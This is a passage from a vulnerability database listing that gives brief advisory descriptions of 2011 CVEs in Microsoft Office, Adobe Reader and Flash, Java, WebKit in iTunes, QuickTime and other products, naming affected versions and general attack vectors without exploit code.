vulnerability in the vba_read_project_strings function in vba_extract.c in libclamav in ClamAV before 0.97 might allow remote attackers to execute arbitrary code via crafted Visual Basic for Applications (VBA) data in a Microsoft Office document. NOTE: some of these details are obtained from third party information. [CVE-2011-0980] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly parse Office Art objects, which allows remote attackers to execute arbitrary code via vectors related to a function pointer, aka "Excel Dangling Pointer Vulnerability." [CVE-2011-0979] Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0978] Stack-based buffer overflow in Microsoft Excel 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-0977] Use-after-free vulnerability in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via malformed shape data in the Office drawing file format, aka "Microsoft Office Graphic Object Dereferencing Vulnerability." [CVE-2011-0976] Microsoft PowerPoint 2002 SP3, 2003 SP3, and 2007 SP2 [CVE-2011-0890] HP Discovery & Dependency Mapping Inventory (DDMI) 7.50, 7.51, 7.60, 7.61, 7.70, and 9.30 launches the Windows SNMP service with its default configuration, which allows remote attackers to obtain potentially sensitive information or have unspecified other impact by leveraging the public read community. [CVE-2011-0866] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Java Runtime Environment. [CVE-2011-0817] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2011-0806] Unspecified vulnerability in the Network Foundation component in Oracle Database Server 10.1.0.5, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2, when running on Windows, allows remote attackers to affect availability via unknown vectors. [CVE-2011-0788] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0786. [CVE-2011-0786] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0788. [CVE-2011-0770] Cross-site scripting (XSS) vulnerability in Windows Event Log SmartConnector in HP ArcSight Connector Appliance before 6.1 allows remote attackers to inject arbitrary web script or HTML via the Windows XP variable in a file. [CVE-2011-0757] IBM DB2 9.1 before FP10, 9.5 before FP6a, and 9.7 before FP2 on Linux, UNIX, and Windows does not properly revoke the DBADM authority, which allows remote authenticated users to execute non-DDL statements by leveraging previous possession of this authority. [CVE-2011-0754] The SplFileInfo::getType function in the Standard PHP Library (SPL) extension in PHP before 5.3.4 on Windows does not properly detect symbolic links, which might make it easier for local users to conduct symlink attacks by leveraging cross-platform differences in the stat structure, related to lack of a FILE_ATTRIBUTE_REPARSE_POINT check. [CVE-2011-0731] Buffer overflow in the DB2 Administration Server (DAS) component in IBM DB2 9.1 before FP10, 9.5 before FP7, and 9.7 before FP3 on Linux, UNIX, and Windows allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2011-0698] Directory traversal vulnerability in Django 1.1.x before 1.1.4 and 1.2.x before 1.2.5 on Windows might allow remote attackers to read or execute files via a / (slash) character in a key in a session cookie, related to session replays. [CVE-2011-0664] Microsoft .NET Framework 2.0 SP1 and SP2, 3.5 Gold and SP1, 3.5.1, and 4.0, and Silverlight 4 before 4.0.60531.0, does not properly validate arguments to unspecified networking API functions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Array Offset Vulnerability." [CVE-2011-0663] Multiple integer overflows in the Microsoft (1) JScript 5.6 through 5.8 and (2) VBScript 5.6 through 5.8 scripting engines allow remote attackers to execute arbitrary code via a crafted web page, aka "Scripting Memory Reallocation Vulnerability." [CVE-2011-0656] Microsoft PowerPoint 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0655] Microsoft PowerPoint 2007 SP2 and 2010 [CVE-2011-0653] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010 Gold and SP1, and SharePoint Foundation 2010, allows remote attackers to inject arbitrary web script or HTML via the URI, aka "XSS in SharePoint Calendar Vulnerability." [CVE-2011-0647] The irccd.exe service in EMC Replication Manager Client before 5.3 and NetWorker Module for Microsoft Applications 2.1.x and 2.2.x allows remote attackers to execute arbitrary commands via the RunProgram function to TCP port 6542. [CVE-2011-0628] Integer overflow in Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code via ActionScript that improperly handles a long array object. [CVE-2011-0626] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0623, CVE-2011-0624, and CVE-2011-0625. [CVE-2011-0625] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0623, CVE-2011-0624, and CVE-2011-0626. [CVE-2011-0624] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0623, CVE-2011-0625, and CVE-2011-0626. [CVE-2011-0623] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0624, CVE-2011-0625, and CVE-2011-0626. [CVE-2011-0622] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0620, and CVE-2011-0621. [CVE-2011-0621] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0620, and CVE-2011-0622. [CVE-2011-0620] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0621, and CVE-2011-0622. [CVE-2011-0619] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0620, CVE-2011-0621, and CVE-2011-0622. [CVE-2011-0618] Integer overflow in Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-0611] Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android [CVE-2011-0610] The CoolType library in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-0609] Unspecified vulnerability in Adobe Flash Player 10.2.154.13 and earlier on Windows, Mac OS X, Linux, and Solaris [CVE-2011-0606] Stack-based buffer overflow in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors related to a crafted length value, a different vulnerability than CVE-2011-0563 and CVE-2011-0589. [CVE-2011-0604] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0587. [CVE-2011-0603] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0566 and CVE-2011-0567. [CVE-2011-0602] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599. [CVE-2011-0600] The U3D component in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a 3D file with an invalid Parent Node count that triggers an incorrect size calculation and memory corruption, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, and CVE-2011-0595. [CVE-2011-0599] The Bitmap parsing component in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted image that causes an invalid pointer calculation related to 4/8-bit RLE compression, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0602. [CVE-2011-0598] Integer overflow in ACE.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code via crafted ICC data, a different vulnerability than CVE-2011-0596, CVE-2011-0599, and CVE-2011-0602. [CVE-2011-0596] The Bitmap parsing component in 2d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via an image with crafted (1) height and (2) width values for an RLE_8 compressed bitmap, which triggers a heap-based buffer overflow, a different vulnerability than CVE-2011-0598, CVE-2011-0599, and CVE-2011-0602. [CVE-2011-0595] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, and CVE-2011-0600. [CVE-2011-0594] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a font. [CVE-2011-0593] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0592] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to "Texture bmp," a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0591] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to Texture and rgba, a different vulnerability than CVE-2011-0590, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0590] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a 3D file, a different vulnerability than CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0589] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0563 and CVE-2011-0606. [CVE-2011-0588] Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0562 and CVE-2011-0570. [CVE-2011-0587] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604. [CVE-2011-0586] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X do not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors. [CVE-2011-0585] Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0565. [CVE-2011-0579] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to obtain sensitive information via unspecified vectors. [CVE-2011-0570] Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0562 and CVE-2011-0588. [CVE-2011-0567] AcroRd32.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image that triggers an incorrect pointer calculation, leading to heap memory corruption, a different vulnerability than CVE-2011-0566 and CVE-2011-0603. [CVE-2011-0566] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0567 and CVE-2011-0603. [CVE-2011-0565] Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585. [CVE-2011-0564] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows use weak permissions for unspecified files, which allows attackers to gain privileges via unknown vectors. [CVE-2011-0563] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0589 and CVE-2011-0606. [CVE-2011-0562] Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0570 and CVE-2011-0588. [CVE-2011-0537] Multiple directory traversal vulnerabilities in (1) languages/Language.php and (2) includes/StubObject.php in MediaWiki 1.8.0 and other versions before 1.16.2, when running on Windows and possibly Novell Netware, allow remote attackers to include and execute arbitrary local PHP files via vectors related to a crafted language file and the Language::factory function. [CVE-2011-0450] The downloads manager in Opera before 11.01 on Windows does not properly determine the pathname of the filesystem-viewing application, which allows user-assisted remote attackers to execute arbitrary code via a crafted web site that hosts an executable file. [CVE-2011-0346] Use-after-free vulnerability in the ReleaseInterface function in MSHTML.DLL in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the DOM implementation and the BreakAASpecial and BreakCircularMemoryReferences functions, as demonstrated by cross_fuzz, aka "MSHTML Memory Corruption Vulnerability." [CVE-2011-0290] The BlackBerry Collaboration Service in Research In Motion (RIM) BlackBerry Enterprise Server (BES) 5.0.3 through MR4 for Microsoft Exchange and Lotus Domino allows remote authenticated users to log into arbitrary user accounts associated with the same organization, and send messages, read messages, read contact lists, or cause a denial of service (login unavailability), via unspecified vectors. [CVE-2011-0258] Apple QuickTime before 7.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted image description associated with an mp4v tag in a movie file. [CVE-2011-0248] Stack-based buffer overflow in the QuickTime ActiveX control in Apple QuickTime before 7.7 on Windows, when Internet Explorer is used, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTL file. [CVE-2011-0247] Multiple stack-based buffer overflows in Apple QuickTime before 7.7 on Windows allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted H.264 movie. [CVE-2011-0246] Heap-based buffer overflow in Apple QuickTime before 7.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted GIF file. [CVE-2011-0215] ImageIO in Apple Safari before 5.0.6 on Windows does not properly address re-entrancy issues, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF file. [CVE-2011-0214] CFNetwork in Apple Safari before 5.0.6 on Windows does not properly handle an untrusted attribute of a system root certificate, which allows remote web servers to bypass intended SSL restrictions via a certificate signed by a blacklisted certification authority. [CVE-2011-0208] QuickLook in Apple Mac OS X 10.6 before 10.6.8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted Microsoft Office document. [CVE-2011-0192] Buffer overflow in Fax4Decode in LibTIFF 3.9.4 and possibly other versions, as used in ImageIO in Apple iTunes before 10.2 on Windows and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF Internet Fax image file that has been compressed using CCITT Group 4 encoding, related to the EXPAND2D macro in libtiff/tif_fax3.h. NOTE: some of these details are obtained from third party information. [CVE-2011-0191] Buffer overflow in LibTIFF 3.9.4 and possibly other versions, as used in ImageIO in Apple iTunes before 10.2 on Windows and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF image with JPEG encoding. [CVE-2011-0170] Heap-based buffer overflow in ImageIO in CoreGraphics in Apple iTunes before 10.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted International Color Consortium (ICC) profile in a JPEG image. [CVE-2011-0168] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0167] The windows functionality in WebKit in Apple Safari before 5.0.4 allows remote attackers to bypass the Same Origin Policy, and force the upload of arbitrary local files from a client computer, via a crafted web site. [CVE-2011-0165] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0164] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0156] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0155] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0154] WebKit, as used in Apple iTunes before 10.2 on Windows and Apple iOS, does not properly implement the .sort function for JavaScript arrays, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0153] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0152] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0151] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0150] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0149] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly parse HTML elements associated with document namespaces, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to a "dangling pointer" and iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0148] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0147] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0146] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0145] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0144] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0143] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0142] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0141] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0140] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0139] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0138] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0137] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0136] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0135] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0134] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0133] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly access glyph data during layout actions for floating blocks associated with pseudo-elements, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0132] Use-after-free vulnerability in the Runin box functionality in the Cascading Style Sheets (CSS) 2.1 Visual Formatting Model implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0131] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0130] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0129] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0128] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0127] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0126] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0125] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0124] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0123] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0122] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0121] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0120] WebKit, as used in Apple iTunes before 10.2 